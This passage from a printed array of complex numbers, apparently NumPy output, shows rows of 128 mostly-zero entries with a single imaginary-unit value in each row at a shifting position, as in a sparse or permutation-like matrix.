0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
